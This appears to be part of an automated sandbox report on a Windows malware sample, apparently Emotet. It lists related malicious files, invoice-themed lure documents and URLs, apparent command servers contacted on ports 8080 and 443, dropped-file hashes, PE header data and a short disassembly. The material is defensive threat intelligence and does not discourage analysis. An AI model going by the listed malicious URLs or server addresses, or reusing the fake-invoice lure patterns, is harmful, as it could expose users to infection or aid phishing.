	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
173.230.145.224	mj03dyvx_2076767.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	Scan1782384.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Scan1782384.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	173.230.145.224:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	173.230.145.224:8080/
	74039.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	Dokumente.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Dokumente.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	http://bri8pos.in/Outstanding-INVOICE-VKBH/2570051/445/	Get hash	malicious	Browse	173.230.145.224:8080/
	uSUbynSM4.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	nbtDJb.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	EmQ2Ard8g4.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	Aj82OO6oKIHl4B.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	http://cinetiux.com/LLC/?newinvoice01.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Emotet119.doc	Get hash	malicious	Browse	173.230.145.224:8080/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ICFSYSTEMSDE	_01_.doc	Get hash	malicious	Browse	193.169.54.12
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	193.169.54.12
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	193.169.54.12
SZERVERNET-HU-ASHU	https://kaliconsultancy.com/wp-content/uploads/2020/09/wflnfkqajn.php	Get hash	malicious	Browse	79.172.193.55
	https://delina.hu/praktikak/2016/02/01/csinalj-te-is-kreativ-mozaikkoveket	Get hash	malicious	Browse	95.140.36.82
	762002910000000.exe	Get hash	malicious	Browse	79.172.193.32
	1Wire_Copy.exe	Get hash	malicious	Browse	79.172.242.87
	430#U0437.js	Get hash	malicious	Browse	79.172.193.32
	59Transfer-copy.exe	Get hash	malicious	Browse	79.172.242.92
	25wire_slip.exe	Get hash	malicious	Browse	79.172.242.89
	BK.485799485.jse	Get hash	malicious	Browse	79.172.193.32
	PO 2312 CBD- 1302 S18.doc	Get hash	malicious	Browse	79.172.242.87
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	79.172.249.82
	Outstanding Invoices.doc	Get hash	malicious	Browse	79.172.249.82
	Outstanding Invoices.doc	Get hash	malicious	Browse	79.172.249.82
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	79.172.249.82
	Outstanding invoice.doc	Get hash	malicious	Browse	79.172.249.82
	Outstanding invoice.doc	Get hash	malicious	Browse	79.172.249.82
	Informationen #018612525.doc	Get hash	malicious	Browse	79.172.249.82
	Informationen #018612525.doc	Get hash	malicious	Browse	79.172.249.82
	http://www.nzbodytalk.org.nz/INCORRECT-INVOICE/	Get hash	malicious	Browse	79.172.249.82
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	79.172.249.82
	74039.exe	Get hash	malicious	Browse	79.172.249.82
LINODE-APLinodeLLCUS	aEdlObiYav.exe	Get hash	malicious	Browse	45.33.54.74
	1m7388e48E.exe	Get hash	malicious	Browse	45.79.26.231
	4849708PO # RMS0001.exe	Get hash	malicious	Browse	45.79.19.196
	SecuriteInfo.com.Trojan.Kronos.21.31435.exe	Get hash	malicious	Browse	139.162.210.252
	Z8bln2YPEw.exe	Get hash	malicious	Browse	96.126.101.20
	yxQWzvifFe.exe	Get hash	malicious	Browse	96.126.123.244
	Purchase _Order-EndUer#99849959.Pdff.exe	Get hash	malicious	Browse	139.162.21.249
	Private document.docm	Get hash	malicious	Browse	139.162.187.154
	p.o_015299.exe	Get hash	malicious	Browse	104.237.142.196
	p.o_015299.exe	Get hash	malicious	Browse	104.237.142.196
	2ojdmC51As.exe	Get hash	malicious	Browse	172.104.97.173
	po#521.exe	Get hash	malicious	Browse	104.237.142.196
	GBv66BGS05.exe	Get hash	malicious	Browse	45.79.222.138
	unpacked.exe	Get hash	malicious	Browse	172.104.179.220
	E-CONTACT_FORM.html	Get hash	malicious	Browse	74.207.250.131
	page.exe	Get hash	malicious	Browse	172.104.225.210
	page.exe	Get hash	malicious	Browse	172.104.225.210
	Private file #8545210.xls	Get hash	malicious	Browse	172.104.151.179
	SecuriteInfo.com.Heur.5671.xls	Get hash	malicious	Browse	176.58.123.25
	PO # 5524792.exe	Get hash	malicious	Browse	45.79.19.196

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5970724702830074
Encrypted:	false
SSDEEP:	6:0FCzZcQEk1GaD0JOCEfMuaaD0JOCEfMKQmDHZc7Al/gz2cE0fMbhEZolrRSQ2hyy:0uZHGaD0JcaaD0JwQQ5qAg/0bjSQJ
MD5:	A3BBD08F5479FAB589EE84226696C232
SHA1:	BD1187F796B0BF8CCB464B50070B19E819A862E5
SHA-256:	B3DC7DCF4A61669A9C96BD58F281D599B232DF0D8DC657919588F99E35D319BA
SHA-512:	122AEF9D94F50101D5E843BC63D69DD446FF84414D165978260707BAD09B94B055EB9907795637F769616FAEC6523E83574BCFDBD49528A22972485713F14103
Malicious:	false
Reputation:	low
Preview:	......:{..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x71939413, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09566706230465119
Encrypted:	false
SSDEEP:	12:ptX0+l1O4blyFEclTK3tX0+l1O4blyFEclTK:ptEU63lutEU63l
MD5:	8CEEAE58F264E4E07A8B3D2C00F0176D
SHA1:	4D72DFF69C813A2105776E78318EC4EAA867723E
SHA-256:	F0A754C4B93D9BC3F48D0BF876734599F45ACC0B2B73CBA29423E0788CFADF81
SHA-512:	DC6CD6A469295146CED4F34EE60B02859657E69C074E6C1558160D185CA3CDC3E25FD4CCC789CD1422D7C176F01BE2C9BDA9D9DF9EFD25FCA604DF61197EDBD8
Malicious:	false
Reputation:	low
Preview:	q...... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................xA......y.k.........................y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.10998340934798412
Encrypted:	false
SSDEEP:	3:0mllll1EvgE+vMuXl/bJdAti4o7gYll:0mtagXvMAt4c71
MD5:	4C3F3659EAEC18E81982E371D5B45E0F
SHA1:	F0182FB4D8AEF66779E3B83F590C424AC08DE57E
SHA-256:	DA5F115297D2AE8B90C365F6EF71CC72D700E9E0E2159F7FBDEC81DC5BCAE4A5
SHA-512:	461C44D55497568CFEE323455743F96AE0C77819636EC59874BBF3EE1D542D44D3A7CDB8AC06CFB2B5EC12B9426EE7039846E841F43BA4B3D431473BC2D0FF1C
Malicious:	false
Reputation:	low
Preview:	.J.......................................3...w.......y.......w...............w.......w....:O.....w...........................y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10977507838515735
Encrypted:	false
SSDEEP:	12:26CSUl9Xm/Ey6q9995jDKq3qQ10nMCldimE8eawHjcE0i:26ZUlgl68JLyMCldzE9BHjcO
MD5:	54DA1703769BA18D0E4389DCD34FDB7D
SHA1:	EFCE7BCAF94B11669985B80D3676B9424F31EFD0
SHA-256:	E089A40924007DBE883AAAB811E46183AAF263EFA0E88AEA0E7C8C0E84C568F8
SHA-512:	1B4372874FCCC56F2A7A7A438AB1E2DBB75E56877F09C0F4A861B0D68D358AD1D4E0E00E21A89ECBF32155A8B8BC490DB959A7417A825791AF52B1C30E09830F
Malicious:	false
Reputation:	low
Preview:	....................................................................................<.../........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................}C..,..... .......\.T#..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....<..........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11240587092483166
Encrypted:	false
SSDEEP:	12:297Xm/Ey6q9995jDn1miM3qQ10nMCldimE8eawHza1miIt/:ll68F1tMLyMCldzE9BHza1tIl
MD5:	D163D7519023BA3C7A42E55CE6C7F221
SHA1:	91048E720FEEEBEFB67A3C54A7FCDC5BADD61BDF
SHA-256:	CC40A44A6C61957CDB1C915F56D45A723ACF117DE73F0686E5AE4B604BBAD3A0
SHA-512:	00BB187CB3D0264C82FF77805039C88C23EE5B4D65984BE29B10BDCBD9D09FC1345A62E44483F0DC57AA8535763F67628294180E3EF7B40F5DEFD390995A7A3A
Malicious:	false
Reputation:	low
Preview:	....................................................................................<............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................}C..,..... .....-.R.T#..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....<....5......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11217673341675179
Encrypted:	false
SSDEEP:	12:2XXm/Ey6q9995jDrg1mK2P3qQ10nMCldimE8eawHza1mKOhd:3l68pg1iPLyMCldzE9BHza1yd
MD5:	5818E45437BF82ECE76B765F53B0A7BE
SHA1:	0CFB80910B2B0D32B9BCE745229DA51A7F0D5363
SHA-256:	5CD3B1123AADBFF207B79A528FDA5EA0AD82562CB32AF04447A491A109A86A91
SHA-512:	2EAB82B5ABCD06F555EA06BD4770EB5ACA720B6EA7AD343CF2EDB73590854A0AF93F8C012F51B45BAEB582D8A8B52B2412FBC6DB73FF59F52AD919A9847549E9
Malicious:	false
Preview:	....................................................................................<...z........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................}C..,..... ......[K.T#..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....<...!.......................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.140492840118901
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rZ0jk9+MlWlLehB4yAq7ejC40u:OaqdmuF3r9+kWReH4yJ7M/
MD5:	F07D8F49D08C02BFE117BB591AD8A2FA
SHA1:	E5DF6866DA2685DEB7C6D979CB875606BA7F08F3
SHA-256:	D3DBEEA6181FC06E01AEA5AC5D5FF9D3287D8BC581F6AA9133DABC2D1838E20D
SHA-512:	1D36F7555220A690501A2453FFF86D0DA4F1AAC881B0EA46DF982E4D208E8DC4EE0F77D573EF9C2EFE46B9E7B749D58BDA4F742F2811728785FCD88F1788265F
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. M.a.r. .. 2.7. .. 2.0.2.1. .1.5.:.0.4.:.2.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. M.a.r. .. 2.7. .. 2.0.2.1. .1.5.:.0.4.:.2.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.436116781781946
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pitEBNziGR.exe
File size:	45568
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
SHA512:	3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
SSDEEP:	768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x409ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4cfe8bbfb0ca5b84bbad08b043ea0c87

Entrypoint Preview

Instruction
push esi
push 0040C1F0h
push 3966646Ch
push 00000009h
mov ecx, D22E2014h
call 00007F8014E5F98Eh
mov edx, 004011F0h
mov ecx, eax
call 00007F8014E5F8B2h
add esp, 0Ch
mov ecx, 8F7EE672h
push 0040C0D0h
push 6677A1D2h
push 00000048h
call 00007F8014E5F969h
mov edx, 004010D0h
mov ecx, eax
call 00007F8014E5F88Dh
add esp, 0Ch
push 08000000h
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C10Ch]
mov esi, eax
test esi, esi
je 00007F8014E67CC8h
push 08000000h
push 00000000h
push esi
call dword ptr [0040C1F8h]
add esp, 0Ch
push esi
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C1E8h]
call 00007F8014E5F2EAh
push 00000000h
call dword ptr [0040C1ACh]
pop esi
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, edx
mov dword ptr [ebp-0Ch], ecx
mov esi, 00000001h
mov dword ptr [ebp-08h], esi
mov eax, dword ptr [edi]
cmp eax, 7Fh
jbe 00007F8014E67CB1h
lea ecx, dword ptr [ecx+00h]
shr eax, 07h
inc esi
cmp eax, 7Fh

Rich Headers

Programming Language:

[LNK] VS2013 UPD4 build 31101
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbad0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd000	0x5cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9883	0x9a00	False	0.503297483766	data	6.45508103349	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0xb2e	0xc00	False	0.160807291667	data	4.23495809712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0xbd8	0x200	False	0.123046875	data	0.91267432928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xd000	0x5cc	0x600	False	0.8671875	data	6.49434732961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	WTSGetActiveConsoleSessionId

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2021 15:02:43.894519091 CET	49713	443	192.168.2.3	79.172.249.82
Mar 27, 2021 15:02:43.945095062 CET	443	49713	79.172.249.82	192.168.2.3
Mar 27, 2021 15:02:43.945318937 CET	49713	443	192.168.2.3	79.172.249.82
Mar 27, 2021 15:02:43.946386099 CET	49713	443	192.168.2.3	79.172.249.82
Mar 27, 2021 15:02:43.996789932 CET	443	49713	79.172.249.82	192.168.2.3
Mar 27, 2021 15:02:43.997226954 CET	443	49713	79.172.249.82	192.168.2.3
Mar 27, 2021 15:02:43.997279882 CET	443	49713	79.172.249.82	192.168.2.3
Mar 27, 2021 15:02:43.997436047 CET	49713	443	192.168.2.3	79.172.249.82
Mar 27, 2021 15:02:43.997457981 CET	49713	443	192.168.2.3	79.172.249.82
Mar 27, 2021 15:02:43.997605085 CET	49713	443	192.168.2.3	79.172.249.82
Mar 27, 2021 15:02:44.048054934 CET	443	49713	79.172.249.82	192.168.2.3
Mar 27, 2021 15:03:14.477927923 CET	49722	8080	192.168.2.3	193.169.54.12
Mar 27, 2021 15:03:17.486954927 CET	49722	8080	192.168.2.3	193.169.54.12
Mar 27, 2021 15:03:23.487704992 CET	49722	8080	192.168.2.3	193.169.54.12
Mar 27, 2021 15:04:06.465989113 CET	49732	8080	192.168.2.3	173.230.145.224
Mar 27, 2021 15:04:09.475627899 CET	49732	8080	192.168.2.3	173.230.145.224
Mar 27, 2021 15:04:15.476480961 CET	49732	8080	192.168.2.3	173.230.145.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2021 15:02:28.666472912 CET	60985	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:28.712373972 CET	53	60985	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:29.405895948 CET	50200	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:29.452003002 CET	53	50200	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:29.629728079 CET	51281	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:29.680325985 CET	53	51281	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:30.173688889 CET	49199	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:30.231422901 CET	53	49199	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:30.939595938 CET	50620	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:30.985704899 CET	53	50620	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:31.731798887 CET	64938	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:31.780687094 CET	53	64938	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:32.485968113 CET	60152	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:32.532075882 CET	53	60152	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:33.321767092 CET	57544	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:33.367885113 CET	53	57544	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:34.447294950 CET	55984	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:34.496387005 CET	53	55984	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:35.439445972 CET	64185	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:35.485779047 CET	53	64185	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:36.272247076 CET	65110	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:36.320940971 CET	53	65110	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:37.040153027 CET	58361	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:37.096976995 CET	53	58361	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:38.058362961 CET	63492	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:38.106487989 CET	53	63492	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:38.938276052 CET	60831	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:38.987651110 CET	53	60831	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:39.720755100 CET	60100	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:39.766904116 CET	53	60100	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:40.486380100 CET	53195	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:40.535448074 CET	53	53195	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:41.509382010 CET	50141	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:41.558227062 CET	53	50141	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:45.882185936 CET	53023	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:45.939310074 CET	53	53023	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:46.664911032 CET	49563	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:46.710887909 CET	53	49563	8.8.8.8	192.168.2.3
Mar 27, 2021 15:02:48.034519911 CET	51352	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:02:48.092123985 CET	53	51352	8.8.8.8	192.168.2.3
Mar 27, 2021 15:03:00.661453962 CET	59349	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:03:00.728981018 CET	53	59349	8.8.8.8	192.168.2.3
Mar 27, 2021 15:03:07.745246887 CET	57084	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:03:07.800983906 CET	53	57084	8.8.8.8	192.168.2.3
